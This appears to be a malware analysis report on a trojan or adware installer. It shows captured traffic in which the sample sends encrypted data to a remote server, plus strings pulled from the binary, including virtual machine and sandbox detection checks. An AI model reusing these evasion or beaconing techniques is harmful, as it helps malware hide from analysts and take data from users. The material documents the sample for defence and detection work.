0fb672c10becde8643dd7cbe16be2e38a9d5aeb28406e6a824b5e245a2d9e8063ecb0e
07c2f62ff464967977a4d4262528bf28af60baeca3057efc1bf7742793984cfa2d46d6
ac9e7db03329dfa1f7f5e095dbe675e86ee19213bc8b2852016e3ca1299949617b613f
7237fef0d3f282fca208c944f76cdf676ff9d177abbce5a1fac817c2493c81e394c27d
27b56467813866f9bceb648705d941d4de7c3375b45e9d75d308a7ac1b7c77398f565f
0da79679ef7a2c0e3f8b2a2191e7623141055bb979fd4119383d1750124f948ea977ab
9c3f310ed3a4b0a5c1e161121def435ee7612ae5e88d708bc592e24ddedfe5a5901da0
2eeb4fa07c4dbb34ec1f8e13a4c0bcb6ea93abe50f698218703037ff60c5cecd32c51d
03fec7e406a80f1121f382302bbcaae7a288d6f32288f8d38e7e58e9df77784023a02e
5619f852bc7fbfd96dafca64e3440d6542d61f3f089de4113f4bc0e1c8d4b1ee6c5393
3420f5421c1658dcc985169ab9c968b652ea7966fefdfa8ae1db06484326236412
<<< skipped >>>

POST /fdd38805b7c819802cbd31bf75157c25b18344f46b22d1305ec5a34db400c252cc764e2deab801466f546f3fbea20ad7ff76bed97ca1888d HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 2 R:1

Host: api.magnofiler.com

Content-Length: 3110

Cache-Control: no-cache

cdata=86394263D6DED7AD3ED013DFEF7E64F6C29F5997166EF97A418F915F82A9AD7FC77F5FC74ED02F99799278738B97993DFA484DED0643C147AF1F76E6047AAC12B04F4D1B9014C49B2B9206253F7B816F613C3C2381141BF9CF3270815E833E217C84153888AF84AD3B25072B7234318ADB6B796AA64B779F2A2FFAABF95EFDC11241AEEFDE629155B76CCA2A4F117755C06DE1498E9C37CD98B521F0FD403F13CB01AF0E4FBF71138F6A88730187FF335D1D49628715144B0C70D3E9EFE7F238A0BD4DC3850AA17491D1411F679F649D153C8BB58D807D75C71D684597E3C53158883877E2B2DF5F9835210215BF8B4E424D54C9DC1B0382804C82DF6DE430D6286F4EC32EFA9C0879E0B5195F873EC93EFD9028384F794BA8001AAD0EFD2F57163951F48C0543140FA71C2CC25B1E684F083496E91153CD0189459D14D516740D975556EED463D549149C64F7817B04107DF3BD3AADB9D05FF4CA61C16FFA52B0B03FC804758BA2BBFE11F6894C15F67736AE213BCEFDF4413BB9970F70654B7C300116460FAB905A38A5DA3C219D77E5831422B475F8B98F771450C586E4A98C88422A4D2D55FEBEE8C1F50ED3ADDFD386B54BF360ED09327D06513E427FC52942CDABED860F111BDC58F37DAE1E5804B1D324B29777FFAC9632ED0D917F4E2946F6770B48CACED65284414A0C6474B822F9F408D2C90856DBF16EC64796FF36885F3B72C81CDD380DE08636AF2F3C2AED38D082A433DEC7F4410C47C75A54BFDCA73553D061A90ACDBBBB1CAF19F13F1039236A470429F74D36870776844693D9CC153EFC1050FE016EF2B070585A29C361BBE62CD
HTTP/1.1 200 OK

Content-Type: text/plain

Date: Sun, 28 Jun 2015 05:46:22 GMT

Server: nginx

Content-Length: 7

Connection: keep-alive
MAXTHX.....


GET /__maxpower__/render_template/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab?language_code=en HTTP/1.1

Accept: */*

Proxy-Authorization: Basic 

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36

Host: api.magnofiler.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Language: en

Content-Type: text/html; charset=utf-8

Date: Sun, 28 Jun 2015 05:46:22 GMT

Server: nginx

Vary: Accept-Language

Content-Length: 2403

Connection: keep-alive
..<!--Template VideoUpdater-->..<div class="container">.&l
t;div class="videupdater">. <div class="minimize">.  <ul&g
t;.    <li><span id="_Bminimize" onclick="minimizeWindow();" 
class="button-min">-</span></li>.    <li><span
 id="_Bexit" onclick="onExit()" class="button-min">x</span>&l
t;/li>.  </ul>.</div>..<div id="_frameContainer" cla
ss="content">..  ..</div>...<!-- buttons -->.<div cl
ass="buttons">..  <!--botones derecha -->.  .  <input id="
_Bnext" class="_Bnext grey right" buttonText="Next" tabindex="0" type=
"submit" value="Next »" onclick='onAccept();'>.  ..  <!--b
otones izquierda -->..  .  <input id="_Bomit" class="_Bomit norm
al-close leftnowidth" tabindex="3" type="submit" name="nombre" value="
Skip All" onclick='onOmit();'>.  .  .  <input id="_Bdecline" cla
ss="_Bdecline normal-close leftnowidth" tabindex="1" type="submit"  na
me="nombre" value="Decline"  onclick='onDecline();'>.  ..  <div 
class="clear"></div>.</div>..  ..<div class="contact
">.  <div class="contact-in" style="height: 20px;">..    <
ul>.      <li><a target='_blank' class="first _TitPrivacy"
>Privacy Policy</a></li>.      <li><a target='
_blank' class="_TitSetup">Setup info</a></li>.      <
;li><a target='_blank' class="_TitFree">Why is this free?<
/a></li>.      <li><a target='_blank' class="_Ti
<<< skipped >>>

GET /maxpower-static/apps/34/68794/css/style.css HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: api.magnofiler.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: text/css

Date: Sun, 28 Jun 2015 05:46:22 GMT

ETag: "5506bcbe-72"

Last-Modified: Mon, 16 Mar 2015 11:21:34 GMT

Server: nginx

Content-Length: 114

Connection: keep-alive
/* mapp MixVideoPlayer */....welcome ul  {...width:210px;..float: left
; ..}...welcome ul li {..margin-top: 10px;.}HTTP/1.1 200 OK..Accept-Ra
nges: bytes..Content-Type: text/css..Date: Sun, 28 Jun 2015 05:46:22 G
MT..ETag: "5506bcbe-72"..Last-Modified: Mon, 16 Mar 2015 11:21:34 GMT.
.Server: nginx..Content-Length: 114..Connection: keep-alive../* mapp M
ixVideoPlayer */....welcome ul  {...width:210px;..float: left; ..}...w
elcome ul li {..margin-top: 10px;.}....


GET /maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/i-download.png HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: api.magnofiler.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: image/png

Date: Sun, 28 Jun 2015 05:46:26 GMT

ETag: "54f07a01-599"

Last-Modified: Fri, 27 Feb 2015 14:06:57 GMT

Server: nginx

Content-Length: 1433

Connection: keep-alive
.PNG........IHDR...*...*.....J.^.....tEXtSoftware.Adobe ImageReadyq.e&
lt;...$iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:24FEED836BEF11E4901AB7
B77D879212" xmpMM:DocumentID="xmp.did:24FEED846BEF11E4901AB7B77D879212
"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:24FEED816BEF11E4
901AB7B77D879212" stRef:documentID="xmp.did:24FEED826BEF11E4901AB7B77D
879212"/> </rdf:Description> </rdf:RDF> </x:xmpmeta&
gt; <?xpacket end="r"?>lW1.....IDATx.b|[email protected]...#...k..
...!..T?.&..}_......{....`..?....{..z...'..a..C*....'V.....&VV"M...eWT
...{..X...b..\\.M.LHP.:..0.v..9..?.>.W.......ax....X...MM.........~
.xA.d....".nTT............/w..c,...!.....\T..;w.Z.......D.K......O....
G.......E..$X.D...9..../......K..$...JD.CF_............>.......Lc.f
.U.$.7.NqJK...".....|}.<|[email protected]..^.T.......d.....9
8.>..w RNK.*....C.._.<..q.....mX.)...?..D.l!.{<...7o......\..
......W.....^.|,?..v.;p.B..B..r..d.~B.........X%....b-<..c {9.Im.O.
.........Z?l...v\. ...F.0_B.5....IEND.B`.....
<<< skipped >>>

GET /maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/loadingBar.gif HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: api.magnofiler.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: image/gif

Date: Sun, 28 Jun 2015 05:46:26 GMT

ETag: "54f07a05-12d72"

Last-Modified: Fri, 27 Feb 2015 14:07:01 GMT

Server: nginx

Content-Length: 77170

Connection: keep-alive
GIF89a|..............................c........"..y..4.....H.....i.....
/..1..2.....M.....W...........v...........-..u........0..1.. ..... ...
.....*.....!.....*.....,..{........z..s.....5........&.."..(..(..,..2.
.4..8..).. ..u..... ..$.....z..m...........*......../..*.....,........
...4..".....%..'.. ..............%........(../..............!.........
.....8.....&..3.....)..... ../........%..4.....!..NETSCAPE2.0.....!..X
MP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> 
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c01
1 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="h
ttp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rd
f:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http:
//ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/s
Type/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" x
mpMM:InstanceID="xmp.iid:C7B15D6A6C0511E4901AB7B77D879212" xmpMM:Docum
entID="xmp.did:C7B15D6B6C0511E4901AB7B77D879212"> <xmpMM:Derived
From stRef:instanceID="xmp.iid:C7B15D686C0511E4901AB7B77D879212" stRef
:documentID="xmp.did:C7B15D696C0511E4901AB7B77D879212"/> </rdf:D
escription> </rdf:RDF> </x:xmpmeta> <?xpacket end="r
"?>................................................................
..................................................................~}|{
zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;
:9876543210/.-, *)('&%$#"! .................................!.....
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

.text

`.rsrc

FV<.tN<[tJ<\tF<*tB<|t><^t:<$t6

PSSSSSSh

J!"#$J%J&'()*J ,JJJJJJJJ-J.JJ/0J1JJJJJJJJJJJJJJJJJJ23JJ4567JJ8JJJJJ9:;JJJJJ<=JJJJJJJJJJJ>?JJJJJJJJ@JJJJJJAJJJJJBJJCJJJJJJJJJJJDEJJJJJJJFJGJJJJJJJJJJJJHJI

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\atlexcept.h

HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0

kernel32.dll

%System%\drivers\vmmouse.sys

%System%\drivers\vmhgfs.sys

%System%\drivers\VBoxMouse.sys

sbiedll.dll

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xdebug

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\streambuf

SELECT * FROM Win32_BIOS WHERE Manufacturer LIKE '%XEN%')

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\cstringt.h

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xlocale

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xiosbase

Software\Microsoft\Windows\CurrentVersion\Uninstall

Software\Classes\ProcMon.Logfile.1\shell\open\command

IsWindowsServer

hXXps://ssl.google-analytics.com/collect?

KNQSSSSST^chiny" /;;HJXZhju&,8>LPTX[aahuy LLTZdq{|*5@CCFO]dpp{||'*/==@ANY``dntx%(48>GRRV[bgpu!/>EIQQ\\

GLNPPPPP\`apz 5;?AIV]jsvz#1=DHPQ]cfr} #&,148::CP]cp|$-7EJTVanz}'')2;>HU[

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xlocnum

O^dgggggp!)19DFPZelss|""#01>AHPS^ky*5<KXfgvx!/>@FPVZZix -/8>MY[ghv}#'6CEIMXZep!/5CKX]ams ( 6APXabn{}$167?@COO\ivv}""*0=EHRT_ix(3@M[[hhu(CRUZ]hvyy(7ES[^giltx| /:BIJOY^

AKRVVVVVdnt%&(0=LWafqy%' 22<GVbdgmx{,033=KXgnuvx"/=BFP[adix$LCPWYZ`ddq

KNQSSSSSSZ[effhoy%-<GV`gt|4COOW]`ms|!08=ALPS]hsx!08GOWcq"/;=KXdqxz$(07

EHKOOOOOP\^`mp}$09@FSZfqx",78GO^iilsv#).8;GR^bdl{%*466;GTW[aghtx)8?APTchst%6CGV[imppu",49FS^ejjy|,17BQ

FUY\\\\\]cmmnuwy&'/3@AAHWegsuy|-0=GO[eoy{!$2:GJVdkmvv#-899DDIIIXXbcq}$.2

CRVeeeeert$$'-/7:<AIUajjtz)/6:@OTcps|=>LNVelv$16:EIX_ehq!!"1@AIVclquz|} ./455DFUYZgq|%(3@ANY]`bjlnn|}}'28=FMYcllt""'38EFMXZ\`cjs#(/6=DJTao} .6BJNTWcpq **0??GIX_bhiot

ENSUUUUUVYenrtz :IJW[hlp}4CGS\ehtvw(--8FIRZao{ ..3AO\fgnz}),/17DDDHHQ\

O]`iiiiis$,77>MXaemz(-9>FQYccrtz'.=HVX`lw"/=>JY]ggqw $'*3>LZ[gn{#$ 29FFU

KNOUUUUU`krz{&-0677ENT_ap|&( 5CRTXYcnu{{

AEKOOOOOUdpr !#.6AJVeejs .36DGP\_gpq| .18FJLM[dop{})89<IR_mpp{*7@NSXZfgh

EHKOOOOOUdpv{%)-:@AOV^adn}*379ELMZhrs"-00>BJS[eor|&&,;FTY`eju}.<KZhmvz*0

GVZcccccotxx &02APQUdpqx||&)2258@COVbety

GSWdddddjr /;GJJYY[dfjqz{} 2=EHQX]fhknou$/4?EHU\]fqz|%)5BLZ^`lz"HDQ[gsv /3ANSSYeet}%')3>?KKMQQU\dhrrz%,8GOS_iu{(1?EKN[hppr{"%-159<>IMQ

JRV[[[[[eehs"&/9;>>DDKTalx	CJR\bcopv&3

()$^.* ?[]|\-{},:=!

HKO\\\\\jv!0;FGS\kz)57EKQ\jsx(.8=GSUdp|}"*46::DR[ggqz$'-;ERRV]]klw!/;JR]

INSTTTTT^``acgs$34?DGLW_esx!%LEPXgor|}

IUVVVVVV`efpv{{|"(*-38BJSajoxz}#(-22:IW`

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\locale

MNUWWWWWalt!,9CMYajy"1<>ER\jpyy %IDHR`elwx'-6ENS\apqq{"&/6EHPR]it!&,3>

invalid _N_type: %d

DRSYYYYYbm|#%,/;GMW^cknrs!%,;HOTbgt|*.1?DLNQX^^lrw7FHO^hmv )3=DKPTV]bg

N\`aaaaaoqtv!FT]bbp})26>ES\beju &,.7?

BKNRRRRRX^aop "))7>EKS`gixz&1::?FS\appw8DKZeps$&&5@MRR^dntx%((78;;FMOT

JUUXXXXXZdqss},0<DIM\cmn|'0;EKZ_gu9DP

HKLPPPPP^jqvCGR[hs| $'*67;BMV[\gr{,48

DDGNNNNNY]gox}78EO[fmy|}&3BEKPVXdnx')*57@FKTY_ahhjmsuLCEQYhox .6@DE

COPRRRRRRSVX[anq""#% 1@ENQXXelsy!-<CPYYhkqz%/005ANSSY\ann|( :DSTcpr{#&5A

CQQZZZZZ^fjps#,7DMT[gnpqv||)47?LW^mw#)2;;;FLU^bgnq})*4@JWWY_iot} :;GS`ksv%FU\fr!/9FNTYZ_gq}%.3@ACLMZhmx(3;FUU]^mu!  -28BNRS]biiqq #,4AHTTbjs ,-.<JS^mw}.<BEKTZis#/8==?EMWYZggs#*2=>JMY`cfhuz"==CKO\alloz*5;EL[gt|'4BEFS]]hoz'5;>IKW

M\_cccccin}))8DFU_jpz (-8;=@KWcfjpqt{&(56:FS[bekwz /<<CGNUdpuv&*9:<CQTXftx=JPZhirz&4?LNPUZgju|$0=FR_l

HQUdddddnqq{' 8@O^km|)35:@GTcp|}#-7?KKVZ

NVX[[[[[^ddqx&&*-;JMV_cmq!"-4BPZfhhlry}!%&-8AGISU[cklqyy}}"-14:CNS[^ijqv

HHM\\\\\dp}))38DKPYZ`hw#(4:GKPUW`bchs|DM[`ejv ,:>?GNWacos#$16EGR\]_eq{!(358@ACEPZ]ces} & 05?MZ]ceppx(*59=CO[`lx{*7>BBL[es!&'-7CQR^dlru|&/;BBQ]dgvD6?JLZ_jy(-6BMMN\e

OVYbbbbbghmt|!0<HSTaipwx)*249AGQT[bdfq CDERZdkzz')59=BHR[ir#128FGU]_d

LOVXXXXXds ''/>CRTU[bnw#1@MU_htx%CMNZelvx(6AAIJMY[]hw}"$' 9>BDOT]lo{}

LNOOOOOOYbjpv%1;GSVXan}")3;?BGQZ^lqt -7FPWep}%%-2<ER[[_dmn|' 1>>>L[cllz

NetBase.cpp

LSXaaaaaekxx$'08?NZho}.5>MY]cnq}*1;BBKS`cfhw!-9DSZcjnw( 38CRR^akw&'*.:;DJR\^gjrryyy()5AM[emqrt$2689@JT]hlrsu$057::BCCRT]_gmu|&0;BQ^inryy

URL EMPTY

"url":"

ParseUrl

/Setup.application

hXXp://

PictureEx.cpp

c:\logFile.txt

hXXp://42e546f0ea2d40afa114ea020951ec9d:9538ea5acbbe4fc6b42811c415685653@

.cpp" ,

errormsg

Error opening key.

Key not found.

CheckRegistryKeyExistance

_virtualGetStringKey

_virtualSetStringKey

_virtualSetDwordKey

_virtualcheckRegkKey

SetStringKey

inflate 1.1.3 Copyright 1995-1998 Mark Adler

CWebBrowser2

0.0.0.0

mb_00000000-0000-0000-0807-060504030201

mb_09F005AE-AC9D-4FC1-AB7A-24004F6C043A

mb_01010101-0101-0101-0101-010101010101

mb_58585858-5858-5858-5858-585858585858

mb_4c4c4544-0000-2010-8020-80c04f202020

mb_11111111-2222-3333-4444-555555555555

mb_11111111-1111-1111-1111-111111111111

mb_00020003-0004-0005-0006-000700080009

mb_890E2D14-CACD-45D1-AE66-BC80E8BFEB0F

mb_8E275844-178F-44A8-ACEB-A7D7E5178C63

mb_52309712-FFFF-FFFF-FFFF-FFFFFFFFFFFF

mb_DC698397-FA54-4CF2-82C8-B1B5307A6A7F

mb_61F39712-FFFF-FFFF-FFFF-FFFFFFFFFFFF

mb_50FB9712-FFFF-FFFF-FFFF-FFFFFFFFFFFF

mb_93309712-FFFF-FFFF-FFFF-FFFFFFFFFFFF

mb_56F49712-FFFF-FFFF-FFFF-FFFFFFFFFFFF

mb_07090201-0103-0301-0807-060504030201

mb_03000200-0400-0500-0006-000700080009

mb_FEFEFEFE-FEFE-FEFE-FEFE-FEFEFEFEFEFE

mb_FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF

mb_00000000-0000-0000-0000-000000000000

CNotSupportedException

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\except.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtls_.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemisc.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winstr.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\strcore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtempl.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afx.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\thrdcore.cpp

m_nMsgLast =

m_msgCur = {

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcoll.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\elements.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl1.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcomctl32.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgcore.cpp

IGNORING command id 0xX sent to %hs dialog.

Routing command id 0xX to app.

Routing command id 0xX to owner window.

Warning: Creating dialog from within a COleControlModule application is not a supported scenario.

Warning: ExecuteDlgInit failed during dialog init.

ERROR: Dialog with IDD 0xX must have the child style.

ERROR: Dialog with IDD 0xX must be invisible.

ERROR: Cannot find dialog template with IDD 0xX.

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp

Warning: unknown WM_MEASUREITEM for menu item 0xX.

hhctrl.ocx

Implementation Warning: control notification = $%X.

Warning: not executing disabled command %d

hWnd = $X (nIDC=$X) is not a %hs.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximpl.h

CCmdTarget

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\cmdtarg.cpp

SENDING control notification %d from control id 0xX to %hs window.

SENDING command id 0xX to %hs target.

No handler for command ID 0xX, disabling it.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp

Error: no data exchange control with ID 0xX.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgdata.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdi.cpp

m_ps.rcPaint =

m_ps.fErase =

m_ps.hdc =

lgpn.lopnColor =

lgpn.lopnWidth.x (width) =

lgpn.lopnStyle =

lb.lbColor =

lb.lbHatch =

lb.lbStyle =

lf.lfFaceName =

lf.lfPitchAndFamily =

lf.lfQuality =

lf.lfClipPrecision =

lf.lfOutPrecision =

lf.lfCharSet =

lf.lfStrikeOut =

lf.lfUnderline =

lf.lfItalic =

lf.lfWeight =

lf.lfOrientation =

lf.lfEscapement =

lf.lfWidth =

lf.lfHeight =

bm.bmBitsPixel =

bm.bmPlanes =

bm.bmWidthBytes =

bm.bmWidth =

bm.bmHeight =

bm.bmType =

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtls.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occmgr.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occdlg.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp

m_pszExeName =

m_nCmdShow =

m_lpCmdLine =

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxadv.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp

Warning: no message line prompt for ID 0xX.

Warning: OnUpdateKeyIndicator - unknown indicator 0xX.

Warning: scroll bars in frame windows may cause unusual behaviour.

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxpriv.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui2.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui1.cpp

Error: failed to load message box prompt string 0xx.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occsite.cpp

IOleInPlaceObject not supported on OLE control (dialog ID %d).

Persistence not supported on OLE control %ls.

%d. Column ordinal %d: Binding as native data type

%d. Column ordinal %d: Binding a COM object

F%d. Column ordinal %d: Binding as an IStream object

%d. Column ordinal %d: Binding as an ISequentialStream object

neither ISequentialStream nor IStream are supported!

IStream is supported

FISequentialStream is supported

Testing streams support...

%d. Column ordinal %d: Binding by reference in provider allocated, consumer owned memory

%d. Column ordinal %d: Binding length and status ONLY

Number of columns: %d

f:\dd\vctools\vc7libs\ship\atlmfc\include\atldbcli.h

Unsupported DBTYPE (%d) in column %d

$@Column %d not bound

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occcont.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdix.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleunk.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxole.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxstate.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\objcore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcobj.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arccore.cpp

CHttpConnection

CHttpFile

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\inet.cpp

Unknown status: %d

Internet ctxt=%d:

Warning: throwing CInternetException for error %d

Warning: Extended error reported with no response info

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appinit.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olevar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcex.cpp

WM_HOTKEY

WM_SETHOTKEY

WM_IDLEUPDATECMDUI

WM_DDE_EXECUTE

WM_KEYLAST

WM_SYSKEYUP

WM_SYSKEYDOWN

WM_KEYUP

WM_KEYDOWN

WM_VKEYTOITEM

WM_CTLCOLORMSGBOX

WM_USER 0xX

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtrace.cpp

Warning: Unable to unpack WM_DDE_EXECUTE lParam lX.

Warning: failed to reclaim %d bytes for memory safety pool.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winhand.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpcont.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_b.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_w.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_d.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_p.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_o.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_pp.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_wo.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_so.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_ss.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgcomm.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\bartool.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcmn.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmenu.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winutil.cpp

Warning: Shrinking safety pool from %d to %d to satisfy request of %d bytes.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgtempl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_p.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olelock.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcrit.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\apphelp.cpp

Error: failed to load AfxFormatString string 0xx.

Error: illegal string index requested %d.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occevent.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filemem.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\plex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui3.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcmn2.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledisp2.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleinit.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcstrm.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleenum.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxmt.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filest.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpout.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\fixalloc.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olefact.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledisp1.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecnvrt.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemsgf.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occlock.cpp

